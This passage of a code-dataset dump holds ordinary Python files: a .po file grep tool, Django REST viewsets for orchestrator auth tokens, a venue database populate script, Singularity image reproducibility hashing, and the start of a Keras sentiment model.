{0}'.format(self.__in_file))\n\n        # out_file\n        self.__out_file = self.__opt_dict['out_file']\n        if (self.__out_file == None):\n            raise RuntimeError('No output file')\n        self.__out_file_obj = None\n\n        self.__verbose_out('# out_file: {0}'.format(self.__out_file))\n\n        # FIXME\n        self.__force_override = False\n\n\n    def __verbose_out(self, mes):\n        \"\"\"verbose output if self.__is_verbose is True\n        \"\"\"\n        if (self.__is_verbose == True):\n            print(mes)\n\n    def __is_match(self, ent):\n        \"\"\"Check the entry matches the current condition.\n        \"\"\"\n        check_str = None\n        if (self.__key_type == 'msgid'):\n            check_str = ent.msgid\n        elif (self.__key_type == 'msgstr'):\n            check_str = ent.msgstr\n        elif (self.__key_type == 'comment'):\n            check_str = ent.comment\n        elif (self.__key_type == 'tcomment'):\n            check_str = ent.tcomment\n        else:\n            raise RuntimeError('Unknown key_type')\n\n        assert(check_str != None)\n        # print('# check_str: '+ check_str)\n        # Here must be search(). 
If match it only compare at the top of the line.\n is_found = self.__recomp.search(check_str) != None\n\n return self.__match_true == is_found\n\n def __out(self, out_str):\n \"\"\"output out_str\"\"\"\n if (self.__out_file_obj != None):\n self.__out_file_obj.write(out_str + '\\n')\n else:\n print(out_str + '\\n')\n\n\n def __process_po_obj(self, po_in):\n \"\"\"process one file\n \"\"\"\n\n # Entry members (see the polib documentation, actually source\n # code of POEntry)\n #\n # comment: string, the entry comment.\n # tcomment: string, the entry translator comment.\n # occurrences: list, the entry occurrences.\n # flags: list, the entry flags.\n # previous_msgctxt: string, the entry previous context.\n # previous_msgid: string, the entry previous msgid.\n # previous_msgid_plural: string, the entry previous msgid_plural.\n # linenum: integer, the line number of the entry\n #\n # Then, msgid, msgstr, (msgcxt)\n for ent in po_in:\n if (self.__is_match(ent) == True):\n self.__out(str(ent))\n else:\n # print('# no match')\n pass\n\n\n def run(self):\n \"\"\"run the po file grep\"\"\"\n\n self.__verbose_out('# Loading {0}'.format(self.__in_file))\n po_in = polib.pofile(self.__in_file, encoding='utf-8')\n self.__verbose_out('# loading done')\n\n\n if (self.__out_file != \"-\"):\n if (os.path.isfile(self.__out_file) and (self.__force_override == False)):\n raise RuntimeError('output file [{0}] exists.'.format(self.__out_file))\n with open(self.__out_file, encoding='utf-8', mode='w') as out_file:\n self.__out_file_obj = out_file\n self.__process_po_obj(po_in)\n else:\n self.__process_po_obj(po_in)\n\n\n @staticmethod\n def get_version_number():\n \"\"\"get the version number list\n [major, minor, maintainance]\n \"\"\"\n return [0, 2, 0]\n\n @staticmethod\n def get_version_string():\n \"\"\"get version information as a string\"\"\"\n vl = Pogrep.get_version_number()\n\n return '''pogrep.py {0}.{1}.{2}\nNew BSD License.\nCopyright (C) 2017-2018 Hitoshi Yamauchi\n'''.format(vl[0], vl[1], vl[2])\n\n\n\ndef pogrep_main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"in_file\", type=str, nargs=1,\n help=\"Input filenames.\")\n\n parser.add_argument(\"out_file\", type=str, default=\"-\", nargs=\"?\",\n help=\"Output filename (- is stdout)\")\n\n parser.add_argument(\"--key-type\", type=str,\n choices=['msgid', 'msgstr', 'comment', 'tcomment'], default='msgid',\n help=\"grep this key type in a po file\")\n\n # nargs tells how many args should be consumed, this is needed when\n # the regex start with '-'. Note: this gives the args in a list.\n parser.add_argument(\"-e\", \"--regexp\", type=str, nargs=1,\n help=\"Use regrep pattern for search. \"\n \"If you need the pattern starts with '-', \"\n \"use = option like -e='-pattern'.\")\n\n parser.add_argument(\"-v\", \"--invert-match\", action=\"store_true\",\n help=\"Invert the sense of matching. 
\"\n \"This selects non-matching entries.\")\n\n parser.add_argument(\"-i\", \"--ignore-case\", action=\"store_true\",\n help=\"Ignore the case in both the regexp match string \"\n \"and the input file.\")\n\n parser.add_argument(\"--force_override\", action='store', default='0',\n help=\"Even outfile is found, override the output file.\")\n\n parser.add_argument(\"--verbose\", action=\"store_true\",\n help=\"increase output verbosity\")\n\n parser.add_argument(\"-V\", \"--version\", action=\"store_true\",\n help=\"output the version number of pogrep.py\")\n\n args = parser.parse_args()\n\n # Switch stdout codecs to utf-8\n sys.stdout = codecs.getwriter(\"utf-8\")(sys.stdout.detach())\n\n if (args.version == True):\n sys.stderr.write(Pogrep.get_version_string())\n sys.exit(1)\n\n if (args.regexp == None):\n raise RuntimeError('-e/--regexp option was not specified.')\n\n opt_dict = {\n 'in_file': args.in_file[0], # nargs gives a list, but we need one\n 'out_file': args.out_file,\n 'key_type': args.key_type,\n 'regexp': args.regexp[0], # nargs gives a list, but we need one\n 'invert_match': args.invert_match,\n 'ignore_case': args.ignore_case,\n 'force_override': args.force_override,\n 'verbose': args.verbose,\n }\n\n pogrep = Pogrep(opt_dict)\n pogrep.run()\n\n\nif __name__ == \"__main__\":\n try:\n pogrep_main()\n sys.exit(0)\n except RuntimeError as err:\n print('Runtime Error: {0}'.format(err))\n sys.exit(2)\n","sub_path":"crowdin_tool/pogrep.py","file_name":"pogrep.py","file_ext":"py","file_size_in_byte":8605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"366781617","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom rest_framework import permissions, status, viewsets\nfrom rest_framework.exceptions import PermissionDenied\nfrom rest_framework.response import Response\n\nfrom ..models import Orchestrator, OrchestratorSerializer, OrchestratorAuth, OrchestratorAuthSerializer\n\nfrom utils import get_or_none\n\n\nclass OrchestratorViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows logs to be viewed\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, )\n serializer_class = OrchestratorSerializer\n\n lookup_field = 'orc_id'\n queryset = Orchestrator.objects.order_by('-name')\n\n permissions = {\n 'create': (permissions.IsAdminUser,),\n 'destroy': (permissions.IsAdminUser,),\n 'partial_update': (permissions.IsAdminUser,),\n 'update': (permissions.IsAdminUser,),\n }\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n return [permission() for permission in self.permissions.get(self.action, self.permission_classes)]\n\n\nclass OrchestratorAuthViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows logs to be viewed\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, )\n serializer_class = OrchestratorAuthSerializer\n\n lookup_field = 'orc_id'\n queryset = OrchestratorAuth.objects.order_by('-user')\n\n def create(self, request, *args, **kwargs):\n data = request.data\n if not request.user.is_staff:\n data['user'] = request.user.username\n\n serializer = self.get_serializer(data=data)\n serializer.is_valid(raise_exception=True)\n\n self.perform_create(serializer)\n\n headers = self.get_success_headers(serializer.data)\n\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n Return a list of all auth tokens 
that the user has permissions for\n        \"\"\"\n        queryset = self.filter_queryset(self.get_queryset())\n\n        if not request.user.is_staff:  # Standard User\n            queryset = queryset.filter(user=request.user)\n\n        page = self.paginate_queryset(queryset)\n        if page is not None:\n            serializer = self.get_serializer(page, many=True)\n            return self.get_paginated_response(serializer.data)\n\n        serializer = self.get_serializer(queryset, many=True)\n        return Response(serializer.data)\n\n    def retrieve(self, request, *args, **kwargs):\n        \"\"\"\n        Return a specific auth token that the user has permissions for\n        \"\"\"\n        auth = self.get_object()\n\n        if not request.user.is_staff:  # Standard User\n            if auth is not None and auth.user != request.user:  # compare users by equality, not identity\n                raise PermissionDenied(detail='User not authorised to access auth token', code=401)\n\n        serializer = self.get_serializer(auth)\n        return Response(serializer.data)\n\n    def update(self, request, *args, **kwargs):\n        auth = self.get_object()\n\n        if not request.user.is_staff:  # Standard User\n            if auth is not None and auth.user != request.user:\n                raise PermissionDenied(detail='User not authorised to update auth token', code=401)\n\n        return super(OrchestratorAuthViewSet, self).update(request, *args, **kwargs)\n\n    def destroy(self, request, *args, **kwargs):\n        auth = self.get_object()\n\n        if not request.user.is_staff:  # Standard User\n            if auth is not None and auth.user != request.user:\n                raise PermissionDenied(detail='User not authorised to delete auth token', code=401)\n\n        return super(OrchestratorAuthViewSet, self).destroy(request, *args, **kwargs)\n","sub_path":"orchestrator/gui/server/gui_server/orchestrator/views/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"436741018","text":"# coding=utf-8\r\nimport os\r\n\r\nos.environ.setdefault('DJANGO_SETTINGS_MODULE',\r\n                      'come_sesh_with_me.settings')\r\n\r\nimport django\r\n\r\ndjango.setup()\r\nfrom sesh.models import Category, Venue, Review\r\n\r\n\r\ndef populate():\r\n    # First, we will create lists of dictionaries containing the pages\r\n    # we want to add into each category.\r\n    # Then we will create a dictionary of dictionaries for our categories.\r\n    # This might seem a little bit confusing, but it allows us to iterate\r\n    # through each data structure, and add the data to our models.\r\n\r\n    night_clubs = [\r\n        {\"name\": \"Garage\",\r\n\t\t\"rating\": \"3\",\r\n\t\t\"website\": \"http://garageglasgow.co.uk/\",\r\n\t\t\"description\": \"It's alright. \",\r\n        \"location\":\"Glasgow\"},\r\n\t\t{\"name\": \"Kushion\",\r\n\t\t\"rating\": \"5\",\r\n\t\t\"website\": \"http://kushionglasgow.co.uk/\",\r\n\t\t\"description\": \"It has swings!!!!! SWINGS!!!!!\",\r\n        \"location\": \"Glasgow\"},\r\n\t\t{\"name\": \"Sub Club\",\r\n\t\t\"rating\": \"2\",\r\n\t\t\"website\": \"http://subclub.co.uk/\",\r\n\t\t\"description\": \"Grimey and pretty sweaty and gross. All the music sounds the same.\",\r\n        \"location\": \"Glasgow\"},\r\n\r\n\t\t{\"name\": \"Bamboo\",\r\n\t\t\"rating\": \"4\",\r\n\t\t\"website\": \"http://www.bamboo51.com/\",\r\n\t\t\"description\": \"Bamboo is a totally unique three roomed basement venue\"\r\n        \" slap bang in the centre of Glasgow. 
With the best variety in\"\r\n \" music and drinks prices 5 nights a week, it’s no wonder \"\r\n \"it’s become one of Glasgow’s most popular nightclubs.\",\r\n \"location\": \"Glasgow\"}]# name, rating, website, description\r\n\r\n pubs=[\r\n\t {\"name\": \"Oran Mor\",\r\n\t \"rating\": \"5\",\r\n\t \"website\": \"http://oranmor.com\",\r\n \"location\": \"Glasgow\",\r\n\t \"description\": \"Oran Mor could barely have any more strings\"\r\n \" to its bow: pub-restaurant, brasserie, music venue, \"\r\n \"theatre, nightclub. There seems to be no containing the inexorable expansion of this hugely successful venue.\"},\r\n {\"name\": \"Firewater\",\r\n\t \"rating\": \"4\",\r\n\t \"website\": \"http://www.firewaterglasgow.com/?page_id=7746\",\r\n \"location\": \"Glasgow\",\r\n\t \"description\": \"Firewater opened in November 2001 with the mission to provide real music and hard liquor to the people of Glasgow.\"\r\n \"Their aim was to rebel against the sludge that pollutes the airwaves in the guise of popular music and fly the flag for Rock N Roll.\"\r\n \"From the 50’s to the present day classics, there is such a thing as a Firewater Anthem and you’ll know it when you hear it!\"},\r\n {\"name\": \"Strip joint\",\r\n \"rating\":\"3\",\r\n \"website\":\"http://stripjointglasgow.co.uk/\",\r\n \"location\": \"Glasgow\",\r\n \"description\":\"Located at the top of the Finnieston strip in Glasgow Strip Joint\"\r\n \" is ideally placed just a five minute walk from the SSE Hydro and \"\r\n \"the SECC. Strip joint is family friendly with a kids “make your own pizza” \"\r\n \"available all day where kids can top their own pizza right at the table.\"}]\r\n\r\n #reviews = [{\"name\": \"Jack\", \"venue\": \"Garage\", \"comment\": \"Had a fantastic night!\",\"likes\": 3,\"dislikes\": 2,\"rating\": 5},\r\n # {\"name\": \"Kate\", \"venue\": \"Garage\", \"comment\":\"Kinda ok\", \"likes\": 1, \"dislikes\": 3, \"rating\":3},\r\n # {\"name\": \"Stan\", \"venue\": \"Bamboo\", \"comment\": \"Wonderful\", \"likes\": 5, \"dislikes\": 0, \"rating\": 4},\r\n # {\"name\": \"Tom\", \"venue\": \"Oran Mor\", \"comment\": \"Not bad !\", \"likes\": 6, \"dislikes\": 3, \"rating\": 5},\r\n # {\"name\": \"Jack\", \"venue\": \"Strip joint\", \"comment\": \"Nice wee pub\", \"likes\": 3, \"dislikes\": 3, \"rating\": 3},\r\n # ]\r\n\r\n #users = [{\"name\":\"Jack\"},{\"name\":\"Kate\"},{\"name\":\"Stan\"},{\"name\":\"Tom\"}]\r\n\r\n cats = {\"Night clubs\": {\"venues\": night_clubs}, \"Pubs\": {\"venues\": pubs}}\r\n\r\n # If you want to add more catergories or pages,\r\n\r\n # add them to the dictionaries above.\r\n\r\n # The code below goes through the cats dictionary, then adds each category,\r\n # and then adds all the associated pages for that category.\r\n # if you are using Python 2.x then use cats.iteritems() see\r\n # http://docs.quantifiedcode.com/python-anti-patterns/readability/\r\n # for more information about how to iterate over a dictionary properly.\r\n\r\n\r\n for cat, cat_data in cats.items():\r\n c = add_cat(cat)\r\n for p in cat_data[\"venues\"]:\r\n add_venue(c, p[\"name\"], p[\"rating\"], p[\"website\"], p[\"description\"], p[\"location\"])\r\n #for review in reviews:\r\n # add_reviews(review, c, p[\"name\"], review[\"name\"])\r\n\r\n\r\n\r\n # Print out the categories we have added.\r\n for c in Category.objects.all():\r\n for p in Venue.objects.filter(category=c):\r\n print(\"- {0} - {1}\".format(str(c), str(p)))\r\n\r\n\r\ndef add_venue(cat, id, rating, url, description, location):\r\n p = 
Venue.objects.get_or_create(category=cat, name=id)[0]\r\n p.website = url\r\n p.rating = rating\r\n p.description = description\r\n p.location = location\r\n p.save()\r\n return p\r\n\r\ndef add_reviews(review, cat, id, name):\r\n #r = Review.objects.get_or_create(venue=Venue.objects.get_or_create(category=cat, name=id)[0], user=UserProfile.objects.)\r\n r = Review.objects.get_or_create(venue=Venue.objects.get(category=cat, name=id), user=UserProfile.objects.get_or_create(name)[0])[0]\r\n r.rating = review[\"rating\"]\r\n r.likes = review[\"likes\"]\r\n r.dislikes = review[\"dislikes\"]\r\n r.save()\r\n\r\n\r\ndef add_cat(name):\r\n c = Category.objects.get_or_create(name=name)[0]\r\n return c\r\n\r\n# Start execution here!\r\nif __name__ == '__main__':\r\n print(\"Starting Rango population script...\")\r\n populate()\r\n","sub_path":"come_sesh_with_me/populate_sesh.py","file_name":"populate_sesh.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"273007204","text":"'''\nreproduce.py: part of singularity package, functions to assess\n reproducibility of images\n\nThe MIT License (MIT)\n\nCopyright (c) 2016-2017 Vanessa Sochat\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n'''\n\nfrom singularity.cli import Singularity\nfrom singularity.logman import bot\nfrom singularity.utils import (\n get_installdir,\n read_json\n)\nimport datetime\nimport hashlib\nimport tarfile\nimport sys\nimport gc\nimport os\nimport re\nimport io\n\n\ndef assess_differences(image_file1,image_file2,levels=None,version=None,size_heuristic=False,\n guts1=None,guts2=None):\n '''assess_differences will compare two images on each level of \n reproducibility, returning for each level a dictionary with files\n that are the same, different, and an overall score.\n :param size_heuristic: if True, assess root owned files based on size\n :param guts1,guts2: the result (dict with sizes,roots,etc) from get_content_hashes\n '''\n if levels is None:\n levels = get_levels(version=version)\n\n reports = dict()\n scores = dict()\n\n for level_name, level_filter in levels.items():\n contenders = []\n different = []\n setdiff = []\n same = 0\n\n # Compare the dictionary of file:hash between two images, and get root owned lookup\n if guts1 is None:\n guts1 = get_content_hashes(image_path=image_file1,\n level_filter=level_filter,\n tag_root=True,\n include_sizes=True)\n \n if guts2 is None:\n guts2 = get_content_hashes(image_path=image_file2,\n level_filter=level_filter,\n tag_root=True,\n include_sizes=True)\n \n files = list(set(list(guts1['hashes'].keys()) + list(guts2['hashes'].keys())))\n\n for file_name in files:\n\n # If it's not in one or the other\n if file_name not in guts1['hashes'] or file_name not in guts2['hashes']:\n setdiff.append(file_name)\n\n else:\n if guts1['hashes'][file_name] == guts2['hashes'][file_name]:\n same+=1\n else:\n\n # If the file is root owned, we compare based on size\n if size_heuristic == True:\n if guts1['root_owned'][file_name] or guts2['root_owned'][file_name]:\n if guts1['sizes'][file_name] == guts2['sizes'][file_name]: \n same+=1\n else:\n different.append(file_name)\n else:\n # Otherwise, we can assess the bytes content by reading it\n contenders.append(file_name)\n else:\n contenders.append(file_name)\n\n # If the user wants identical (meaning extraction order and timestamps)\n if level_name == \"IDENTICAL\":\n different = different + contenders\n\n # Otherwise we need to check based on byte content\n else: \n if len(contenders) > 0:\n cli = Singularity()\n for rogue in contenders:\n hashy1 = extract_content(image_file1,rogue,cli,return_hash=True)\n hashy2 = extract_content(image_file2,rogue,cli,return_hash=True)\n \n # If we can't compare, we use size as a heuristic\n if hashy1 is None or hashy2 is None: # if one is symlink, could be None\n different.append(file_name) \n elif len(hashy1) == 0 or len(hashy2) == 0:\n if guts1['sizes'][file_name] == guts2['sizes'][file_name]: \n same+=1\n else:\n different.append(file_name) \n elif hashy1 != hashy2:\n different.append(rogue)\n else:\n same+=1\n\n # We use a similar Jacaard coefficient, twice the shared information in the numerator \n # (the intersection, same), as a proportion of the total summed files\n union = len(guts1['hashes']) + len(guts2['hashes'])\n\n report = {'difference': setdiff,\n 'intersect_different': different,\n 'same':same,\n 'union': union}\n \n if union == 0:\n scores[level_name] = 0\n else:\n scores[level_name] = 2*(same) / union\n 
reports[level_name] = report\n\n gc.collect()\n reports['scores'] = scores\n return reports\n\n\ndef get_custom_level(regexp=None,description=None,skip_files=None,include_files=None):\n '''get_custom_level will generate a custom level for the user, \n based on a regular expression. If used outside the context of tarsum, the user\n can generate their own named and described filters.\n :param regexp: must be defined, the file filter regular expression\n :param description: optional description\n '''\n if regexp == None:\n regexp = \".\"\n if description is None:\n description = \"This is a custom filter generated by the user.\"\n \n custom = {\"description\":description,\n \"regexp\":regexp}\n\n # Include extra files?\n if include_files is not None:\n if not isinstance(include_files,set):\n include_files = set(include_files)\n custom['include_files'] = include_files\n\n # Skip files?\n if skip_files is not None:\n if not isinstance(skip_files,set):\n skip_files = set(skip_files)\n custom['skip_files'] = skip_files\n\n return custom\n\n\ndef get_level(level,version=None,include_files=None,skip_files=None):\n '''get_level returns a single level, with option to customize files\n added and skipped.\n '''\n\n levels = get_levels(version=version)\n level_names = list(levels.keys())\n\n if level.upper() in level_names:\n level = levels[level]\n else:\n bot.logger.warning(\"%s is not a valid level. Options are %s\",level.upper(),\n \"\\n\".join(levels)) \n return None\n\n # Add additional files to skip or remove, if defined\n if skip_files is not None:\n level = modify_level(level,'skip_files',skip_files)\n if include_files is not None:\n level = modify_level(level,'include_files',include_files)\n\n level = make_level_set(level)\n return level\n\n\ndef modify_level(level,field,values,append=True):\n '''modify level is intended to add / modify a content type.\n Default content type is list, meaning the entry is appended.\n If you set append to False, the content will be overwritten\n For any other content type, the entry is overwritten.\n '''\n field = field.lower()\n valid_fields = ['regexp','skip_files','include_files']\n if field not in valid_fields:\n bot.logger.warning(\"%s is not a valid field, skipping. Choices are %s\",field,\",\".join(valid_fields))\n return level\n if append:\n if not isinstance(values,list):\n values = [values]\n if field in level:\n level[field] = level[field] + values\n else:\n level[field] = values\n else:\n level[field] = values\n\n level = make_level_set(level)\n\n return level \n\n\ndef get_levels(version=None):\n '''get_levels returns a dictionary of levels (key) and values (dictionaries with\n descriptions and regular expressions for files) for the user. 
\n :param version: the version of singularity to use (default is 2.2)\n :param include_files: files to add to the level, only relvant if\n '''\n valid_versions = ['2.3','2.2']\n\n if version is None:\n version = \"2.3\" \n version = str(version)\n\n if version not in valid_versions:\n bot.logger.error(\"Unsupported version %s, valid versions are %s\",version,\",\".join(valid_versions))\n\n levels_file = os.path.abspath(os.path.join(get_installdir(),\n 'hub',\n 'data',\n 'reproduce_levels.json'))\n levels = read_json(levels_file)\n if version == \"2.2\":\n # Labels not added until 2.3\n del levels['LABELS']\n\n levels = make_levels_set(levels)\n\n return levels\n\n\ndef make_levels_set(levels):\n '''make set efficient will convert all lists of items\n in levels to a set to speed up operations'''\n for level_key,level_filters in levels.items():\n levels[level_key] = make_level_set(level_filters)\n return levels\n \n\ndef make_level_set(level):\n '''make level set will convert one level into\n a set'''\n new_level = dict()\n for key,value in level.items():\n if isinstance(value,list):\n new_level[key] = set(value)\n else:\n new_level[key] = value\n return new_level \n\n\ndef include_file(member,file_filter):\n '''include_file will look at a path and determine\n if it matches a regular expression from a level\n '''\n member_path = member.name.replace('.','',1)\n\n if len(member_path) == 0:\n return False\n\n # Does the filter skip it explicitly?\n if \"skip_files\" in file_filter:\n if member_path in file_filter['skip_files']:\n return False\n\n # Include explicitly?\n if \"include_files\" in file_filter:\n if member_path in file_filter['include_files']:\n return True\n\n # Regular expression?\n if \"regexp\" in file_filter:\n if re.search(file_filter[\"regexp\"],member_path):\n return True\n return False\n\n\ndef is_root_owned(member):\n '''assess if a file is root owned, meaning \"root\" or user/group \n id of 0'''\n if member.uid == 0 or member.gid == 0:\n return True\n elif member.uname == 'root' or member.gname == 'root':\n return True\n return False\n \n\ndef assess_content(member,file_filter):\n '''Determine if the filter wants the file to be read for content.\n In the case of yes, we would then want to add the content to the\n hash and not the file object.\n '''\n member_path = member.name.replace('.','',1)\n\n if len(member_path) == 0:\n return False\n\n # Does the filter skip it explicitly?\n if \"skip_files\" in file_filter:\n if member_path in file_filter['skip_files']:\n return False\n\n if \"assess_content\" in file_filter:\n if member_path in file_filter['assess_content']:\n return True\n return False\n\n\ndef get_image_hashes(image_path,version=None,levels=None):\n '''get_image_hashes returns the hash for an image across all levels. This is the quickest,\n easiest way to define a container's reproducibility on each level.\n '''\n if levels is None:\n levels = get_levels(version=version)\n hashes = dict()\n for level_name,level_filter in levels.items():\n hashes[level_name] = get_image_hash(image_path,\n level_filter=level_filter)\n return hashes\n\n\ndef get_image_hash(image_path,level=None,level_filter=None,\n include_files=None,skip_files=None,version=None):\n '''get_image_hash will generate a sha1 hash of an image, depending on a level\n of reproducibility specified by the user. 
(see function get_levels for descriptions)\n the user can also provide a level_filter manually with level_filter (for custom levels)\n :param level: the level of reproducibility to use, which maps to a set regular\n expression to match particular files/folders in the image. Choices are in notes.\n :param skip_files: an optional list of files to skip\n :param include_files: an optional list of files to keep (only if level not defined)\n :param version: the version to use. If not defined, default is 2.3\n\n ::notes\n\n LEVEL DEFINITIONS\n The level definitions come down to including folders/files in the comparison. For files\n that Singularity produces on the fly that might be different (timestamps) but equal content\n (eg for a replication) we hash the content (\"assess_content\") instead of the file.\n ''' \n\n # First get a level dictionary, with description and regexp\n if level_filter is not None:\n file_filter = level_filter\n\n elif level is None:\n file_filter = get_level(\"RECIPE\",\n version=version,\n include_files=include_files,\n skip_files=skip_files)\n\n else:\n file_filter = get_level(level,version=version,\n skip_files=skip_files,\n include_files=include_files)\n \n cli = Singularity()\n file_obj,tar = get_memory_tar(image_path)\n hasher = hashlib.md5()\n\n for member in tar:\n member_name = member.name.replace('.','',1)\n\n # For files, we either assess content, or include the file\n if member.isdir() or member.issym():\n continue\n elif assess_content(member,file_filter):\n content = extract_content(image_path,member.name,cli)\n hasher.update(content)\n elif include_file(member,file_filter):\n buf = member.tobuf()\n hasher.update(buf)\n\n digest = hasher.hexdigest()\n file_obj.close()\n return digest\n\n\ndef extract_content(image_path,member_name,cli=None,return_hash=False):\n '''extract_content will extract content from an image using cat.\n If hash=True, a hash sum is returned instead\n '''\n if member_name.startswith('./'):\n member_name = member_name.replace('.','',1)\n if return_hash:\n hashy = hashlib.md5()\n if cli == None:\n cli = Singularity()\n content = cli.execute(image_path,'cat %s' %(member_name))\n if not isinstance(content,bytes):\n content = bytes(content)\n # If permissions don't allow read, return None\n if len(content) == 0:\n return None\n if return_hash:\n hashy.update(content)\n return hashy.hexdigest()\n return content\n\n\ndef get_content_hashes(image_path,level=None,regexp=None,include_files=None,tag_root=True,\n level_filter=None,skip_files=None,version=None,include_sizes=True):\n '''get_content_hashes is like get_image_hash, but it returns a complete dictionary \n of file names (keys) and their respective hashes (values). 
This function is intended\n for more research purposes and was used to generate the levels in the first place.\n If include_sizes is True, we include a second data structure with sizes\n ''' \n if level_filter is not None:\n file_filter = level_filter\n\n elif level is None:\n file_filter = get_level(\"REPLICATE\",version=version,\n skip_files=skip_files,\n include_files=include_files)\n\n else:\n file_filter = get_level(level,version=version,\n skip_files=skip_files,\n include_files=include_files)\n\n file_obj,tar = get_memory_tar(image_path)\n results = extract_guts(image_path,tar,file_filter,tag_root,include_sizes)\n file_obj.close()\n return results\n\n\ndef extract_guts(image_path, tar,file_filter,tag_root=True,include_sizes=True):\n '''extract_guts will extract the file guts from an in memory tarfile.\n The file is not closed.\n '''\n\n cli = Singularity()\n results = dict()\n digest = dict()\n\n if tag_root:\n roots = dict()\n\n if include_sizes: \n sizes = dict()\n\n for member in tar:\n member_name = member.name.replace('.','',1)\n included = False\n if member.isdir() or member.issym():\n continue\n elif assess_content(member,file_filter):\n digest[member_name] = extract_content(image_path,member.name,cli,return_hash=True)\n included = True\n elif include_file(member,file_filter):\n hasher = hashlib.md5()\n buf = member.tobuf()\n hasher.update(buf)\n digest[member_name] = hasher.hexdigest()\n included = True\n if included:\n if include_sizes:\n sizes[member_name] = member.size\n if tag_root:\n roots[member_name] = is_root_owned(member)\n\n results['hashes'] = digest\n if include_sizes:\n results['sizes'] = sizes\n if tag_root:\n results['root_owned'] = roots\n return results\n\n\ndef get_image_file_hash(image_path):\n '''get_image_hash will return an md5 hash of the file based on a criteria level.\n :param level: one of LOW, MEDIUM, HIGH\n :param image_path: full path to the singularity image\n '''\n hasher = hashlib.md5()\n with open(image_path, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hasher.update(chunk)\n return hasher.hexdigest()\n\n\ndef get_memory_tar(image_path):\n '''get an in memory tar of an image (does not require sudo!)'''\n cli = Singularity()\n if \"pancakes\" in os.environ:\n del os.environ['pancakes']\n byte_array = cli.export(image_path)\n file_object = io.BytesIO(byte_array)\n tar = tarfile.open(mode=\"r|*\", fileobj=file_object)\n return (file_object,tar)\n","sub_path":"singularity/reproduce.py","file_name":"reproduce.py","file_ext":"py","file_size_in_byte":18512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"162938871","text":"import re\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport nltk\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom nltk.corpus import stopwords\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers import Dense, Conv1D, MaxPooling1D, Flatten, Embedding\nimport numpy as np\nimport os\nfrom keras.preprocessing.sequence import pad_sequences\nimport sys\n\n\n# A small pre-processing function to clean up\ndef clean_review(text):\n # Strip HTML tags\n text = re.sub('<[^<]+?>', ' ', text)\n text = text.replace('\\\\\"', '')\n text = text.replace('\"', '')\n text = re.sub(r'[\\r\\n]',' ',text)\n text = re.sub(r'[\\.!?,:] *', '. 
', text)\n return text.strip()\n\n\ndef clean_score(num):\n\tif num > 10:\n\t\tnum = num/10\n\n\tif num<=5 :\n\t\treturn 0\n\telif num==5 or num==6:\n\t\treturn 0.5\n\telse:\n\t\treturn 1\n\t\ndef to_sequence(tokenizer, preprocessor, index, text):\n words = tokenizer(preprocessor(text))\n indexes = [index[word] for word in words if word in index]\n return indexes\n\n\ndef fill_set(str1='data/mc_training.csv', str2='data/mc_testing.csv'):\n\n\tdf2 = pd.read_csv(str1)\n\tdf3 = pd.read_csv(str2)\n\n\t#create cleaned review, which is every \"review\" entry passed through the clean_review function above\n\n\tdf2['cleaned_review'] = df2['body'].apply(clean_review)\n\tdf2['sentiment'] = df2['score'].apply(clean_score)\n\n\tdf3['cleaned_review'] = df3['body'].apply(clean_review)\n\tdf3['sentiment'] = df3['score'].apply(clean_score)\n\n\t#create test and training sets with a split\n\t#X_train, X_test, y_train, y_test = train_test_split(df['cleaned_review'], df['sentiment'], test_size=0.3)\n\n\treturn \t(df2['cleaned_review'], df3['cleaned_review'], df2['sentiment'], df3['sentiment'])\n\n\n\nclass sentMod:\n\n\n\tdef sequence_setup(self, X_train):\n\n\t\tself.vectorizer = CountVectorizer(binary=True, stop_words=stopwords.words('english'), min_df=3, max_df=0.9, max_features=None)\n\n\t\tX_train_onehot = self.vectorizer.fit_transform(X_train)\n\n\t\t#They take word-ids as input, so we first have to transform the input into a series of word ids\n\t\tself.word2idx = {word: idx for idx, word in enumerate(self.vectorizer.get_feature_names())}\n\t\tself.tokenize = self.vectorizer.build_tokenizer()\n\t\tself.preprocess = self.vectorizer.build_preprocessor()\n\t\t \n\t\tX_train_sequences = [to_sequence(self.tokenize, self.preprocess, self.word2idx, x) for x in X_train]\n\n\t\tself.MAX_SEQ_LENGHT = len(max(X_train_sequences, key=len))\n\t\tself.N_FEATURES = 